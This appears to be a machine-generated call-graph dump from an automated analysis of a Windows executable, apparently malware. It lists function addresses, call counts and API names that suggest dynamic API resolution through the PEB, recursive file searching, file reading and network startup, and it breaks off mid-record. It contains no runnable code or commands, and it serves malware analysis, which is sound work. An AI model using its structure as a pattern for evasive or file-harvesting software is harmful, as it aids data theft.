10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 15 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 15 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 14 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 14 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 19 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 12 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap RtlFreeHeap 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 14 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 14 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 20 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 13 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 13 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 15 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 15 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 15 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 15 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 13 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 